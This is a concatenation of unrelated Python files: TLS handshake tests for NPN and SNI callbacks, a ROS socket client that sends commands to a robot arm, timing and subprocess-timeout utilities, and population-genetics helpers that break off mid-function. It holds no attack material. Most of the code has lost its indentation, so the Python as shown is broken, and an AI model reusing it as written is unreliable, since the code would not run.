server_protocols = ['http/1.1', 'spdy/2']
protocol_tests = [
(['http/1.1', 'spdy/2'], 'http/1.1'),
(['spdy/2', 'http/1.1'], 'http/1.1'),
(['spdy/2', 'test'], 'spdy/2'),
(['abc', 'def'], 'abc')
]
for client_protocols, expected in protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_npn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_cert_chain(CERTFILE)
client_context.set_npn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_npn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_npn_protocols'][-1] \
if len(stats['server_npn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
@needs_sni
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
# CERTFILE4 was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, 'localhost')
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, 'localhost')
self.assertEqual(calls, [])
@needs_sni
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
@needs_sni
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1.0/0.0
server_context.set_servername_callback(cb_raising)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertIn("ZeroDivisionError", stderr.getvalue())
@needs_sni
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertIn("TypeError", stderr.getvalue())
def test_read_write_after_close_raises_valuerror(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket())
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_main(verbose=False):
if support.verbose:
plats = {
'Linux': platform.linux_distribution,
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, REMOTE_ROOT_CERT, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [ContextTests, BasicTests, BasicSocketTests, SSLErrorTests]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
if _have_threads:
thread_info = support.threading_setup()
if thread_info:
tests.append(ThreadedTests)
try:
support.run_unittest(*tests)
finally:
if _have_threads:
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
Hiwin_RT605_ArmCommand_Socket_20190627194540.py
|
#!/usr/bin/env python3
# license removed for brevity
import rospy
import os
import socket
## multithreading
import threading
import time
import sys
import matplotlib as plot
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import numpy as np
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
from std_msgs.msg import Int32MultiArray
import math
import enum
#Socket = 0
data = '0' # initial value of the data to transmit
Arm_feedback = 1 # assume the arm is busy
NAME = 'socket_server'
arm_mode_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0.0,36.8,11.35,-90.0,0.0,0.0)
##------------class socket_cmd---------
class socket_data():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
socket_cmd = socket_data(0,0.0,0,0,0,0,0)
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
        return  # end the generator; raising StopIteration here becomes RuntimeError under PEP 479 (Python 3.7+)
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
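# Illustrative usage sketch (not part of the original file): shows how the
# switch/case recipe above is driven by a for loop, including multi-value
# cases and an empty case() acting as the default branch.
def _switch_demo(value):
    for case in switch(value):
        if case(1):
            return "one"
        if case(2, 3):
            return "two or three"
        if case():  # default: matches anything
            return "something else"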
##-----------client feedback arm state----------
class StateFeedback():
def __init__(self,ArmState,SentFlag):
self.ArmState = ArmState
self.SentFlag = SentFlag
state_feedback = StateFeedback(0,0)
class client():
def __init__(self):
#self.get_connect()
pass
def get_connect(self):
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s.connect(('192.168.0.1', 8080))
def send(self, msg):
        self.s.send(msg.encode('utf-8'))  # encode the str as UTF-8 bytes before sending
def get_recieve(self):
        data = self.s.recv(1024)  # 1024 is the receive buffer size (max bytes per read)
        # return the raw bytes; callers inspect individual byte values
        return data
def close(self):
self.s.close()
#Socket = client()
def point_data(x,y,z,pitch,roll,yaw): ## receive the pose data sent by the strategy side
pos.x = x
pos.y = y
pos.z = z
pos.pitch = pitch
pos.roll = roll
pos.yaw = yaw
##----------Arm Mode-------------###
def Arm_Mode(action,grip,ra,setvel,setboth): ## receive the arm mode data sent by the strategy side
global arm_mode_flag
socket_cmd.action = action
socket_cmd.grip = grip
socket_cmd.ra = ra
socket_cmd.setvel = setvel
socket_cmd.setboth = setboth
arm_mode_flag = True
Socket_command()
##-------Arm Speed Mode------------###
def Speed_Mode(speedmode): ## receive the arm speed mode sent by the strategy side
socket_cmd.Speedmode = speedmode
def socket_talker(): ## create the server node
pub = rospy.Publisher('chatter', Int32MultiArray, queue_size=10)
rospy.init_node(NAME)
rate = rospy.Rate(10) # 10hz
print ("Ready to connect")
while not rospy.is_shutdown():
# hello_str = "hello world %s" % rospy.get_time()
state = Int32MultiArray()
state.data = [state_feedback.ArmState,state_feedback.SentFlag]
pub.publish(state)
rate.sleep()
##---------- socket packet transmission --------------##
##--------------- socket: transmit arm commands -----------------
def Socket_command():
global arm_mode_flag,data
    s = client()
    s.get_connect()  # open the TCP connection; client() alone does not connect
if arm_mode_flag == True:
arm_mode_flag = False
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
            #------- set arm velocity --------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
            #------- set arm delay time --------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
            #------- set arm rapid & safe speed mode --------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
        socket_cmd.action = 6  ## reset to the initial mode state
print(data)
print("Socket:", s)
        #Socket.send(data.encode('utf-8'))  # socket send: encode the str so it can be transmitted
s.send(data)
##-----------socket client--------
def socket_client():
try:
        Socket = client()  # instantiate the client here (previously commented out, causing a NameError below)
        Socket.get_connect()
#Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
print('Connection has been successful')
except socket.error as msg:
print(msg)
sys.exit(1)
#print('Connection has been successful')
print(Socket.get_recieve())
Socket_feedback(Socket)
rospy.on_shutdown(myhook)
Socket.close()
def Socket_feedback(s):
Socket = s
while 1:
feedback_str = Socket.get_recieve()
        #the arm side reports the arm state
        if str(feedback_str[2]) == '48':# F: arm is Ready and can accept the next motion command
            state_feedback.ArmState = 0
        if str(feedback_str[2]) == '49':# T: arm is busy and cannot execute the next motion command
            state_feedback.ArmState = 1
        if str(feedback_str[2]) == '54':# 6: strategy finished
            state_feedback.ArmState = 6
            print("shutdown")
        #confirm the send flag
        if str(feedback_str[4]) == '48':# returns 0, false
            state_feedback.SentFlag = 0
        if str(feedback_str[4]) == '49':# returns 1, true
            state_feedback.SentFlag = 1
        ##--------------- socket: transmit arm commands end -----------------
if state_feedback.ArmState == Taskcmd.Arm_feedback_Type.shutdown:
break
##-----------socket client end--------
##------------- socket packet transmission end --------------##
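## Illustrative sketch (not part of the original protocol handling): the feedback
## loop above compares raw byte values at fixed offsets, where ord('0') == 48,
## ord('1') == 49 and ord('6') == 54. The hypothetical helper below makes that
## mapping explicit for a single feedback frame.
def _parse_feedback_demo(frame):
    arm_state = chr(frame[2])         # '0' ready, '1' busy, '6' strategy finished
    sent_flag = chr(frame[4]) == '1'  # True when the send-flag byte is '1'
    return arm_state, sent_flag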
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
    socket_cmd.action = 6  ## reset to the initial mode state
    ## multithreading
    t = threading.Thread(target=socket_client)
    t.start()  # start the worker thread
#time.sleep(1)
try:
socket_talker()
except rospy.ROSInterruptException:
pass
t.join()
    ## multithreading end
|
utils.py
|
from timeit import default_timer as timer
import multiprocessing as mp
import math
class TicToc():
def __init__(self):
self.t = None
self.results = {}
def tic(self):
self.t = timer()
def toc(self, name):
if self.t is None:
raise RuntimeError('Timer not started')
diff = timer() - self.t
self.t = None
if name in self.results:
self.results[name].append(diff)
else:
self.results[name] = [diff]
def histogram(self, show=True, save_to=None, figsize=None):
import matplotlib.pyplot as plt
num_subplots = len(self.results)
if figsize is None:
figsize = (num_subplots * 5, 5)
figure, axes = plt.subplots(1, num_subplots, figsize=figsize)
if num_subplots == 1:
axes = [axes]
for idx, (name, vals) in enumerate(self.results.items()):
axes[idx].hist(vals)
axes[idx].set_xlabel('time / s')
axes[idx].title.set_text(name)
axes[idx].set_yscale('log', nonposy='clip')
if save_to is not None:
figure.savefig(save_to)
if show:
plt.show()
else:
plt.close(figure)
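# Minimal usage sketch (illustrative, not part of the original module): time a
# named region repeatedly with tic()/toc() and inspect the collected samples.
def _tictoc_demo(n=100):
    tt = TicToc()
    for _ in range(n):
        tt.tic()
        sum(i * i for i in range(1000))  # some work to time
        tt.toc('square_sum')
    return len(tt.results['square_sum'])  # == n timing samples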
def _wrapped_target(pipe_conn: 'mp.connection.Connection'):
target, args = pipe_conn.recv()
res = target(*args)
pipe_conn.send(res)
def run_with_timeout(target, timeout, args=()):
"""Wraps target function into a subprocess where arguments and result are transferred via pipes. Terminates process after timeout seconds. Returns if finished by its own and function result"""
parent_conn, child_conn = mp.Pipe()
proc = mp.Process(target=_wrapped_target, args=(child_conn,))
proc.start()
parent_conn.send((target, args))
proc.join(timeout=timeout)
if proc.is_alive():
proc.terminate()
proc.join()
return False, None
else:
res = parent_conn.recv()
return True, res
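# Usage sketch (illustrative): run a function with a hard timeout. The target is
# pickled through the pipe, so it must be defined at module scope.
def _slow_square(x, delay=0.0):
    import time
    time.sleep(delay)
    return x * x

def _run_with_timeout_demo():
    ok, res = run_with_timeout(_slow_square, timeout=5, args=(7,))
    assert ok and res == 49             # finished on its own
    ok, res = run_with_timeout(_slow_square, timeout=0.1, args=(7, 5.0))
    assert not ok and res is None       # killed after the timeout
    return ok, res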
def _wrapped_target_persistent(pipe_conn: 'mp.connection.Connection'):
while True:
target, args = pipe_conn.recv()
res = target(*args)
pipe_conn.send(res)
class PersistentWorker():
def __init__(self):
self.process = None
self.connection = None
def call(self, target, args, timeout):
if self.process is None:
self.connection, child_conn = mp.Pipe()
self.process = mp.Process(target=_wrapped_target_persistent, args=(child_conn,))
self.process.start()
self.connection.send((target, args))
if not self.connection.poll(timeout):
self.process.terminate()
self.process.join()
self.process = None
return False, None
else:
res = self.connection.recv()
return True, res
def terminate(self):
if self.process is not None:
self.process.terminate()
self.process.join()
self.process = None
self.connection = None
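# Usage sketch (illustrative): a PersistentWorker keeps one subprocess alive
# across calls, avoiding per-call process start-up cost; call() recreates the
# worker transparently after a timeout has killed it.
def _persistent_worker_demo():
    w = PersistentWorker()
    ok, res = w.call(math.factorial, (10,), timeout=5)    # (True, 3628800)
    ok2, res2 = w.call(math.factorial, (12,), timeout=5)  # reuses the same process
    w.terminate()
    return res, res2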
def abbrev_count(count):
log_count = math.floor(math.log10(count))
k_exponent = math.floor(log_count / 3)
suffixes = ['', 'k', 'm']
return '{:g}{}'.format(count / 10**(k_exponent*3), suffixes[k_exponent])
def dataset_name(num_aps, tree_size, num_formulas, polish=True, unsat_frac=0.0, simplify=False, require_trace=True, name_prefix=None, **kwargs):
folder = name_prefix + '-' if name_prefix is not None else ''
if isinstance(tree_size, int):
tree_size = str(tree_size)
else:
tree_size = str(tree_size[0]) + '-' + str(tree_size[1])
folder_substrs = ['na', str(num_aps), 'ts', tree_size, 'nf']
folder_substrs.append(abbrev_count(num_formulas))
folder += '-'.join(folder_substrs)
if polish:
folder += '-lbt'
if unsat_frac <= 0.0:
folder += '-sat'
else:
folder += '-unsat-' + str(unsat_frac)
if simplify:
folder += '-simpl'
if not require_trace:
folder += '-open'
return folder
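# Illustrative example (not part of the original module) of the names produced
# above: abbrev_count(2500) -> '2.5k', and the call below assembles the folder
# name 'na-5-ts-10-20-nf-100k-lbt-sat'.
def _dataset_name_demo():
    return dataset_name(num_aps=5, tree_size=(10, 20), num_formulas=100000)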
|
helpers.py
|
'''
Authors: Jared Galloway, Jeff Adrion
'''
from iai.imports import *
from iai.sequenceBatchGenerator import *
#-------------------------------------------------------------------------------------------
def log_prior(theta):
''' The natural logarithm of the prior probability. '''
lp = 0.
# unpack the model parameters from the tuple
m, c = theta
# uniform prior on c
cmin = -10. # lower range of prior
cmax = 10. # upper range of prior
# set prior to 1 (log prior to 0) if in the range and zero (-inf) outside the range
lp = 0. if cmin < c < cmax else -np.inf
# Gaussian prior on m
mmu = 3. # mean of the Gaussian prior
msigma = 10. # standard deviation of the Gaussian prior
lp -= 0.5*((m - mmu)/msigma)**2
return lp
#-------------------------------------------------------------------------------------------
def log_like(theta, data, sigma, x):
'''The natural logarithm of the likelihood.'''
# unpack the model parameters
m, c = theta
# evaluate the model
md = straight_line(x, m, c)
# return the log likelihood
return -0.5 * np.sum(((md - data)/sigma)**2)
#-------------------------------------------------------------------------------------------
def log_post(theta, data, sigma, x):
'''The natural logarithm of the posterior.'''
    return log_prior(theta) + log_like(theta, data, sigma, x)
#-------------------------------------------------------------------------------------------
def log_prob(x, mu, icov):
return -0.5 * np.dot(np.dot((x-mu).T,icov),(x-mu))
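#-------------------------------------------------------------------------------------------
def _log_post_demo():
    '''Illustrative sketch (not part of the original pipeline): evaluates the
    log-posterior defined above on synthetic straight-line data. It assumes
    straight_line(x, m, c), used inside log_like(), is provided by the starred
    imports.'''
    x = np.linspace(0., 9., 10)
    m_true, c_true, sigma = 3., 1., 0.5
    data = m_true * x + c_true + np.random.normal(0., sigma, size=x.shape)
    # the true parameters should score better than a poor guess
    return log_post((m_true, c_true), data, sigma, x) > log_post((0., 0.), data, sigma, x)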
#-------------------------------------------------------------------------------------------
def assign_task(mpID, task_q, nProcs):
c,i,nth_job=0,0,1
while (i+1)*nProcs <= len(mpID):
i+=1
nP1=nProcs-(len(mpID)%nProcs)
for j in range(nP1):
task_q.put((mpID[c:c+i], nth_job))
nth_job += 1
c=c+i
for j in range(nProcs-nP1):
task_q.put((mpID[c:c+i+1], nth_job))
nth_job += 1
c=c+i+1
#-------------------------------------------------------------------------------------------
def create_procs(nProcs, task_q, result_q, params, worker):
pids = []
for _ in range(nProcs):
p = mp.Process(target=worker, args=(task_q, result_q, params))
p.daemon = True
p.start()
pids.append(p)
return pids
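#-------------------------------------------------------------------------------------------
def _demo_worker(task_q, result_q, params):
    '''Hypothetical worker (illustrative only): consumes the (ids, nth_job)
    tuples queued by assign_task() and pushes one result per task.'''
    while True:
        try:
            ids, nth_job = task_q.get(timeout=0.5)
        except Exception:
            break
        result_q.put((nth_job, [i * params for i in ids]))
#-------------------------------------------------------------------------------------------
def _demo_parallel(mpID=range(10), nProcs=2, params=3):
    '''Illustrative sketch (not part of the original pipeline): wires together
    assign_task() and create_procs(); assumes mp (multiprocessing) is provided
    by the starred imports, as create_procs() already requires.'''
    task_q, result_q = mp.Queue(), mp.Queue()
    assign_task(list(mpID), task_q, nProcs)
    pids = create_procs(nProcs, task_q, result_q, params, _demo_worker)
    results = [result_q.get() for _ in range(nProcs)]  # one result per queued task
    for p in pids:
        p.join()
    return sorted(results)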
#-------------------------------------------------------------------------------------------
def get_corrected_index(L,N):
idx,outN="",""
dist=float("inf")
for i in range(len(L)):
D=abs(N-L[i])
if D < dist:
idx=i
outN=L[i]
dist=D
return [idx,outN]
#-------------------------------------------------------------------------------------------
def get_corrected(rate,bs):
idx=get_corrected_index(bs["Q2"],rate)
CI95LO=bs["CI95LO"][idx[0]]
CI95HI=bs["CI95HI"][idx[0]]
cRATE=relu(rate+(bs["rho"][idx[0]]-idx[1]))
ciHI=relu(cRATE+(CI95HI-idx[1]))
ciLO=relu(cRATE+(CI95LO-idx[1]))
return [cRATE,ciLO,ciHI]
#-------------------------------------------------------------------------------------------
def get_index(pos, winSize):
y=snps_per_win(pos,winSize)
st=0
indices=[]
for i in range(len(y)):
indices.append([st,st+y[i]])
st+=y[i]
return indices
#-------------------------------------------------------------------------------------------
def snps_per_win(pos, window_size):
bins = np.arange(1, pos.max()+window_size, window_size) #use 1-based coordinates, per VCF standard
y,x = np.histogram(pos,bins=bins)
return y
#-------------------------------------------------------------------------------------------
def find_win_size(winSize, pos, winSizeMx):
snpsWin=snps_per_win(pos,winSize)
mn,u,mx = snpsWin.min(), int(snpsWin.mean()), snpsWin.max()
if mx > winSizeMx:
return [-1]
elif mx < winSizeMx:
return [1]
else:
return [winSize,mn,u,mx,len(snpsWin)]
#-------------------------------------------------------------------------------------------
def force_win_size(winSize, pos):
snpsWin=snps_per_win(pos,winSize)
mn,u,mx = snpsWin.min(), int(snpsWin.mean()), snpsWin.max()
return [winSize,mn,u,mx,len(snpsWin)]
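#-------------------------------------------------------------------------------------------
def _snps_per_win_demo():
    '''Illustrative sketch (not part of the original pipeline): bins synthetic
    1-based SNP positions into 100 bp windows and returns the same summary
    force_win_size() produces, i.e. [winSize, min, mean, max, nWindows].'''
    pos = np.array([5, 30, 120, 130, 250, 260, 270])
    counts = snps_per_win(pos, 100)   # array([2, 2, 3]) SNPs per window
    assert counts.sum() == len(pos)
    return force_win_size(100, pos)   # [100, 2, 2, 3, 3]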
#-------------------------------------------------------------------------------------------
def maskStats(wins, last_win, mask, maxLen):
"""
    return a three-element list: the first element is the total proportion of the window that is masked,
    the second is a list of masked positions relative to the window (start = 0, end = window length),
    and the third is the index of the last window before breaking, to expedite the next loop
"""
chrom = wins[0].split(":")[0]
a = wins[1]
L = wins[2]
b = a + L
prop = [0.0,[],0]
try:
for i in range(last_win, len(mask[chrom])):
x, y = mask[chrom][i][0], mask[chrom][i][1]
if y < a:
continue
if b < x:
return prop
else: # i.e. [a--b] and [x--y] overlap
if a >= x and b <= y:
return [1.0, [[0,maxLen]], i]
elif a >= x and b > y:
win_prop = (y-a)/float(b-a)
prop[0] += win_prop
prop[1].append([0,int(win_prop * maxLen)])
prop[2] = i
elif b <= y and a < x:
win_prop = (b-x)/float(b-a)
prop[0] += win_prop
prop[1].append([int((1-win_prop)*maxLen),maxLen])
prop[2] = i
else:
win_prop = (y-x)/float(b-a)
prop[0] += win_prop
prop[1].append([int(((x-a)/float(b-a))*maxLen), int(((y-a)/float(b-a))*maxLen)])
prop[2] = i
return prop
except KeyError:
return prop
#-------------------------------------------------------------------------------------------
def check_demHist(path):
fTypeFlag = -9
with open(path, "r") as fIN:
for line in fIN:
if line.startswith("mutation_per_site"):
fTypeFlag = 1
break
if line.startswith("label"):
fTypeFlag = 2
break
if line.startswith("time_index"):
fTypeFlag = 3
break
return fTypeFlag
#-------------------------------------------------------------------------------------------
def convert_msmc_output(results_file, mutation_rate, generation_time):
"""
    This function converts the output from msmc into a csv that will be read in for
plotting comparison.
MSMC outputs times and rates scaled by the mutation rate per basepair per generation.
First, scaled times are given in units of the per-generation mutation rate.
This means that in order to convert scaled times to generations,
divide them by the mutation rate. In humans, we used mu=1e-8 per basepair per generation.
To convert generations into years, multiply by the generation time, for which we used 10 years.
To get population sizes out of coalescence rates, first take the inverse of the coalescence rate,
scaledPopSize = 1 / lambda00. Then divide this scaled population size by 2*mu
"""
outfile = results_file+".csv"
out_fp = open(outfile, "w")
in_fp = open(results_file, "r")
header = in_fp.readline()
out_fp.write("label,x,y\n")
for line in in_fp:
result = line.split()
time = float(result[1])
time_generation = time / mutation_rate
time_years = time_generation * generation_time
lambda00 = float(result[3])
scaled_pop_size = 1 / lambda00
size = scaled_pop_size / (2*mutation_rate)
out_fp.write(f"pop0,{time_years},{size}\n")
    out_fp.close()
return None
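#-------------------------------------------------------------------------------------------
# Worked example of the scaling described in the docstring above (illustrative
# numbers): with mu = 1e-8 per bp per generation and a 10-year generation time,
# a scaled time of 1e-5 is 1e-5 / 1e-8 = 1,000 generations = 10,000 years, and a
# coalescence rate lambda00 = 2500 gives (1 / 2500) / (2 * 1e-8) = 20,000.
def _msmc_scaling_demo(scaled_time=1e-5, lambda00=2500.0, mu=1e-8, gen=10.0):
    time_years = (scaled_time / mu) * gen      # 10,000.0 years
    size = (1.0 / lambda00) / (2.0 * mu)       # 20,000.0 individuals
    return time_years, size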
#-------------------------------------------------------------------------------------------
def convert_demHist(path, nSamps, gen, fType, mu):
swp, PC, DE = [],[],[]
# Convert stairwayplot to msp demographic_events
if fType == 1:
with open(path, "r") as fIN:
flag=0
lCt=0
for line in fIN:
if flag == 1:
if lCt % 2 == 0:
swp.append(line.split())
lCt+=1
if line.startswith("mutation_per_site"):
flag=1
N0 = int(float(swp[0][6]))
for i in range(len(swp)):
if i == 0:
PC.append(msp.PopulationConfiguration(sample_size=nSamps, initial_size=N0))
else:
DE.append(msp.PopulationParametersChange(time=int(float(swp[i][5])/float(gen)), initial_size=int(float(swp[i][6])), population=0))
## Convert MSMC to similar format to smc++
if fType == 3:
convert_msmc_output(path, mu, gen)
path+=".csv"
## Convert smc++ or MSMC results to msp demographic_events
if fType == 2 or fType == 3:
with open(path, "r") as fIN:
fIN.readline()
for line in fIN:
ar=line.split(",")
swp.append([int(float(ar[1])/gen),int(float(ar[2]))])
N0 = swp[0][1]
for i in range(len(swp)):
if i == 0:
PC.append(msp.PopulationConfiguration(sample_size=nSamps, initial_size=N0))
else:
DE.append(msp.PopulationParametersChange(time=swp[i][0], initial_size=swp[i][1], population=0))
dd=msp.DemographyDebugger(population_configurations=PC,
demographic_events=DE)
print("Simulating under the following population size history:")
dd.print_history()
MspD = {"population_configurations" : PC,
"migration_matrix" : None,
"demographic_events" : DE}
if MspD:
return MspD
else:
print("Error in converting demographic history file.")
sys.exit(1)
#-------------------------------------------------------------------------------------------
def relu(x):
return max(0,x)
#-------------------------------------------------------------------------------------------
def zscoreTargets(self):
norm = self.targetNormalization
nTargets = copy.deepcopy(self.infoDir['y'])
if(norm == 'zscore'):
tar_mean = np.mean(nTargets,axis=0)
tar_sd = np.std(nTargets,axis=0)
nTargets -= tar_mean
nTargets = np.divide(nTargets,tar_sd,out=np.zeros_like(nTargets),where=tar_sd!=0)
#-------------------------------------------------------------------------------------------
def load_and_predictVCF(VCFGenerator,
resultsFile=None,
network=None,
minS = 50,
gpuID = 0,
hotspots = False):
os.environ["CUDA_VISIBLE_DEVICES"] = str(gpuID)
# load json and create model
if(network != None):
jsonFILE = open(network[0],"r")
loadedModel = jsonFILE.read()
jsonFILE.close()
model=model_from_json(loadedModel)
model.load_weights(network[1])
else:
print("Error: no pretrained network found!")
sys.exit(1)
x,chrom,win,info,nSNPs = VCFGenerator.__getitem__(0)
predictions = model.predict(x)
if hotspots:
with open(resultsFile, "w") as fOUT:
ct=0
fOUT.write("%s\t%s\t%s\t%s\t%s\n" %("chrom","start","end","nSites","hotspot"))
for i in range(len(predictions)):
if nSNPs[i] >= minS:
fOUT.write("%s\t%s\t%s\t%s\t%s\n" %(chrom,ct,ct+win,nSNPs[i],predictions[i][0]))
ct+=win
else:
u=np.mean(info["rho"])
sd=np.std(info["rho"])
last = int(os.path.basename(resultsFile).split(".")[0].split("-")[-1])
with open(resultsFile, "w") as fOUT:
ct=0
fOUT.write("%s\t%s\t%s\t%s\t%s\n" %("chrom","start","end","nSites","recombRate"))
for i in range(len(predictions)):
if nSNPs[i] >= minS:
fOUT.write("%s\t%s\t%s\t%s\t%s\n" %(chrom,ct,min(ct+win,last),nSNPs[i],relu(sd*predictions[i][0]+u)))
ct+=win
return None
#-------------------------------------------------------------------------------------------
class TimingCallback(tf.keras.callbacks.Callback):
def __init__(self, logs={}):
self.logs=[]
def on_epoch_begin(self, epoch, logs={}):
self.starttime = timer()
def on_epoch_end(self, epoch, logs={}):
self.logs.append(timer()-self.starttime)
#-------------------------------------------------------------------------------------------
def runModels_cleverhans_tf2(ModelFuncPointer,
ModelName,
